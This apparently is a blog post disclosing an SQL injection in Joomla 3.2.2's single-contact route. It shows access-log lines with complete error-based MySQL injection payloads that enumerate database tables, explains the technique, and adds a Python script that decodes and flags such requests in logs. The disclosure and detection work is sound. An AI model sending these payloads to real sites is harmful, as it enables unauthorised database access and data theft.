Saturday 3 May 2014

How I met your Joomla 3.2.2 SQL Injection

In March this year I found that Joomla 3.2.2 with default data
installed is vulnerable to an SQL injection attack.
 

After a few lines from the April log,
you should know how it was done.

root@poc:/var/log/apache2# tail -n 1 -f access.log
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+0%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6727 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:45 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6745 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+2%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+4%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:47 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+5%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6739 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+6%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6754 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:48 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+7%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6730 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+8%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6760 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"
10.149.14.63 - - [23/Apr/2014:22:32:49 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+9%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6751 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0"


Joomla 3.2.2 error
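What the log shows, once the URL encoding is stripped, is the classic MySQL "double query" error-based technique appended to the numeric id of /single-contact/{id}: `and (select 1 from (select count(*), concat(<data>, floor(rand(0)*2)) x from information_schema.tables group by x) a)`. rand(0) is seeded, so its sequence is the same on every run, and MySQL evaluates the GROUP BY key a second time while building its temporary table, so the same key is inserted twice and the query aborts with error 1062, "Duplicate entry '...' for key 'group_key'", where the duplicate key is the attacker's `<data>`. The hex literals are just strings (0x6A6F6F6D6C61333232 is `joomla322`, 0x7e and 0x27 are the `~` and `'` markers framing the leaked value), and the requests walk the schema one row per request: first `count(table_name)`, then `table_name ... limit 0,1`, `limit 1,1` and so on. The script below is an added example, not code from the post: it decodes combined-log lines of this shape, rewrites the hex literals so the injected SQL reads as SQL, and flags the double-query pattern together with the schema, the expression being leaked and the row offset. The regex and function names are mine, the sample lines are two requests copied from the log above (User-Agent shortened) plus one constructed benign request, and it assumes the `+` in the request path stand for spaces, which is how the payload was sent.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample: the first two lines are requests copied from the access log above
# (User-Agent shortened), the third is a benign request for the same route, for contrast.
SAMPLE_LOG = """\
10.149.14.63 - - [23/Apr/2014:22:32:44 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6661 "-" "Mozilla/5.0"
10.149.14.63 - - [23/Apr/2014:22:32:46 -0500] "GET /k/joomla322/index.php/single-contact/1+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Ctable_name%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x6A6F6F6D6C61333232+limit+3%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1 HTTP/1.1" 1062 6748 "-" "Mozilla/5.0"
10.149.14.63 - - [23/Apr/2014:22:33:10 -0500] "GET /k/joomla322/index.php/single-contact/1 HTTP/1.1" 200 6600 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d+)')
HEX_RE = re.compile(r'0x([0-9A-Fa-f]+)\b')
# The "double query" primitive: floor(rand(0)*2) used as a GROUP BY key. rand(0) is seeded,
# so its sequence is fixed, and MySQL evaluates the key again while filling the GROUP BY
# temporary table; the same key is inserted twice and the query aborts with error 1062
# "Duplicate entry '<key>' for key 'group_key'", <key> being whatever was concat()ed in front
# of the floor() value, i.e. the attacker's data.
DOUBLE_QUERY_RE = re.compile(r'floor\(\s*rand\(\s*0\s*\)\s*\*\s*2\s*\).*?group\s+by', re.I | re.S)
SCHEMA_RE = re.compile(r"table_schema\s*=\s*'([^']*)'", re.I)
ROW_RE = re.compile(r"table_schema\s*=\s*'[^']*'\s+limit\s+(\d+)\s*,\s*1", re.I)
# innermost concat('~',"'",<expr>,"'",'~') after hex decoding: <expr> is what the error leaks
TARGET_RE = re.compile(r'''concat\('~',"'",(.+?),"'",'~'\)''', re.I)


def hex_to_literal(match):
    """Turn a MySQL 0x.. literal into a quoted string so the decoded payload reads as plain SQL."""
    digits = match.group(1)
    if len(digits) % 2:
        return match.group(0)            # odd length: a number, not a byte string; leave it
    text = bytes.fromhex(digits).decode('latin-1')
    quote = '"' if "'" in text else "'"  # pick the quote that does not occur in the text
    return quote + text + quote


def decode_request(line):
    """URL-decode the request path of one combined-log line; None if the line does not parse."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None
    # unquote_plus also maps '+' to a space, which is how the spaces in the payload were sent
    return {'path': unquote_plus(m.group('path')), 'status': int(m.group('status'))}


def analyse(line):
    """Reconstruct the SQL injected into the /single-contact/{id} segment and say what it leaks."""
    req = decode_request(line)
    if req is None:
        return None
    payload = req['path'].rsplit('/', 1)[-1]      # the {id} segment carries the injection
    sql = HEX_RE.sub(hex_to_literal, payload)
    result = {'status': req['status'], 'sql': sql, 'error_based': False,
              'schema': None, 'target': None, 'row': None}
    if DOUBLE_QUERY_RE.search(sql):
        result['error_based'] = True
        for key, rx in (('schema', SCHEMA_RE), ('target', TARGET_RE), ('row', ROW_RE)):
            m = rx.search(sql)
            if m:
                result[key] = int(m.group(1)) if key == 'row' else m.group(1)
    return result


def scan(log_text):
    """Return the analysis of every line that carries the error-based double-query pattern."""
    hits = []
    for line in log_text.splitlines():
        r = analyse(line)
        if r and r['error_based']:
            hits.append(r)
    return hits


if __name__ == '__main__':
    for r in scan(SAMPLE_LOG):
        print(f"status={r['status']} schema={r['schema']} leaks={r['target']} row={r['row']}")
        print("  " + r['sql'])
```

Run against a real access.log the `row` field gives away how far an enumeration got (the log above stops at `limit 9,1`), and a long run of requests for the same route whose decoded id segment contains `group by` is a reliable hunting signal even on a server that does not, as here, surface the 1062 in the log line.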


Why I decided to publish it. And here you will find even more.


Enjoy
o/